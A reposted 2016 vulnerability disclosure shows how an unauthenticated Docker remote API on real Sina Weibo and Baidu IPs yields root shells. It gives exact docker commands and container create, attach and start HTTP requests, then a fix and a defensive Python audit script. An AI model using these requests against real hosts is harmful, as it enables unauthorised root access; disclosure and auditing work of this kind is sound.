神刀安全网

Vulnerability title: Sina Weibo docker remote API unauthorized access leads to remote command execution (root)

Vulnerability details

Disclosure status:

2016-05-17: Details reported to the vendor, awaiting the vendor's response
2016-05-17: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

Two Sina Weibo IPs expose the docker remote API without authentication, leading to remote command execution with root privileges. Because the docker version is too old, I temporarily used burp to send a few HTTP requests that call the API and achieved remote command execution. This writeup also covers how to obtain an interactive shell directly.

Detailed description:

Code:
http://123.125.105.158:2375/version
http://123.125.105.159:2375/version

"ApiVersion":"1.17" - because the API version is so old, my docker client cannot be used against it. I used burp to send the requests and achieve remote execution of system commands; there is a small trick involved.

Proof of vulnerability:

Install the docker client:

Code:
https://www.docker.com/products/docker-toolbox

Taking the Baidu IP as an example, to get an interactive shell, first list the images:

Code:
docker -H tcp://180.76.161.55:2375 images

Code:
docker -H tcp://180.76.161.55:2375 run -it --entrypoint /bin/bash ubuntu "-h"

Here I set the entrypoint to /bin/bash. Shell obtained, as shown in the screenshot:

OK, back to Weibo's machines. Because the API version is too old, the client cannot be used directly.

At first my commands kept failing; only when inspecting the container did I discover that the default Entrypoint is /usr/local/sinasrv2/sbin/nginx. It can be overwritten when the container is created, though. Create a container:

Code:
POST /v1.17/containers/create HTTP/1.1
Host: 123.125.105.158:2375
User-Agent: Docker-Client/1.7.0 (windows)
Content-Length: 1082
Content-Type: application/json
Accept-Encoding: gzip

{"Hostname":"","Domainname":"","User":"","AttachStdin":true,"AttachStdout":true,"AttachStderr":true,"ExposedPorts":{},"PublishService":"","Tty":true,"OpenStdin":true,"StdinOnce":true,"Env":[],"Cmd":["-h"],"Image":"registry.intra.weibo.com/weibo_blogarticle/tfs-nginx:20150625","Volumes":{},"VolumeDriver":"","WorkingDir":"","Entrypoint":["/bin/bash","-c"],"NetworkDisabled":false,"MacAddress":"","OnBuild":null,"Labels":{},"HostConfig":{"Binds":null,"ContainerIDFile":"","LxcConf":[],"Memory":0,"MemorySwap":0,"CpuShares":0,"CpuPeriod":0,"CpusetCpus":"","CpusetMems":"","CpuQuota":0,"BlkioWeight":0,"OomKillDisable":false,"MemorySwappiness":-1,"Privileged":false,"PortBindings":{},"Links":null,"PublishAllPorts":false,"Dns":null,"DnsSearch":null,"ExtraHosts":null,"VolumesFrom":null,"Devices":[],"NetworkMode":"","IpcMode":"","PidMode":"","UTSMode":"","CapAdd":null,"CapDrop":null,"GroupAdd":null,"RestartPolicy":{"Name":"no","MaximumRetryCount":0},"SecurityOpt":null,"ReadonlyRootfs":false,"Ulimits":null,"LogConfig":{"Type":"","Config":{}},"CgroupParent":"","ConsoleSize":[42,80]}}

Find the Id, as shown in the screenshot:

Then you can fetch the container's info to check whether anything is wrong; this step can be skipped:

Code:
http://123.125.105.158:2375/v1.17/containers/bcd44e3731cc11cd0afe93445fd2e8ee9b0a34e7c39018920320b88fa6acd57b/json

Next come two HTTP requests. The order is critical: attach first, then start, so that the output can be captured:

Code:
POST /v1.17/containers/bcd44e3731cc11cd0afe93445fd2e8ee9b0a34e7c39018920320b88fa6acd57b/attach?stderr=1&stdin=1&stdout=1&stream=1 HTTP/1.1
Host: 123.125.105.158:2375
User-Agent: Docker-Client/1.7.0 (windows)
Content-Length: 0
Content-Type: application/json
Accept-Encoding: gzip

Code:
POST /v1.17/containers/bcd44e3731cc11cd0afe93445fd2e8ee9b0a34e7c39018920320b88fa6acd57b/start HTTP/1.1
Host: 123.125.105.158:2375
User-Agent: Docker-Client/1.7.0 (windows)
Content-Length: 0
Content-Type: application/json
Accept-Encoding: gzip

As shown in the screenshot, I executed commands inside Weibo's container: the current user is root, the hostname is bcd44e3731cc, and pwd is app.


Fix:

Do not expose port 2375 externally
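As an added defender-side example (not part of the original report), a small Python audit that checks a dockerd command line and daemon.json for the misconfiguration behind this report: a tcp:// listener on a non-loopback address without --tlsverify, which is exactly what leaves port 2375 open to anyone. The sample command line and daemon.json it parses are constructed.

```python
import json
import shlex
from urllib.parse import urlsplit

# Constructed sample inputs (not from the report): a weak dockerd command line
# and a hardened daemon.json that only allows TLS client-certificate access.
WEAK_CMDLINE = "dockerd -H tcp://0.0.0.0:2375 -H unix:///var/run/docker.sock"
HARDENED_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",
})

LOOPBACK = {"127.0.0.1", "::1", "localhost"}


def _collect_listeners(cmdline, daemon_json):
    """Gather -H/--host values and daemon.json 'hosts', plus whether --tlsverify is set."""
    argv = shlex.split(cmdline)
    hosts, tlsverify = [], False
    for i, arg in enumerate(argv):
        if arg in ("-H", "--host") and i + 1 < len(argv):
            hosts.append(argv[i + 1])
        elif arg.startswith("--host="):
            hosts.append(arg.split("=", 1)[1])
        elif arg in ("--tlsverify", "--tlsverify=true"):
            tlsverify = True
    cfg = json.loads(daemon_json) if daemon_json else {}
    hosts.extend(cfg.get("hosts", []))
    return hosts, tlsverify or bool(cfg.get("tlsverify"))


def audit_dockerd(cmdline, daemon_json=None):
    """Classify each tcp:// listener; 'unauthenticated' is the condition behind this report."""
    findings = []
    hosts, tlsverify = _collect_listeners(cmdline, daemon_json)
    for listener in hosts:
        url = urlsplit(listener)
        if url.scheme != "tcp":
            continue  # unix:// and fd:// sockets are local-only, no remote API exposure
        bind_addr = url.hostname or "0.0.0.0"  # an empty host means all interfaces
        if bind_addr in LOOPBACK:
            verdict = "loopback-only"
        elif tlsverify:
            verdict = "tls-client-auth"
        else:
            verdict = "unauthenticated"  # anyone who can reach the port is root on the host
        findings.append((listener, verdict))
    return findings
```

Even the tls-client-auth case should still be firewalled to the hosts that need it; the audit only tells you which listeners would hand out root to any client that can connect.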

Copyright notice: when reposting, please credit the source lijiejie@乌云 (WooYun)
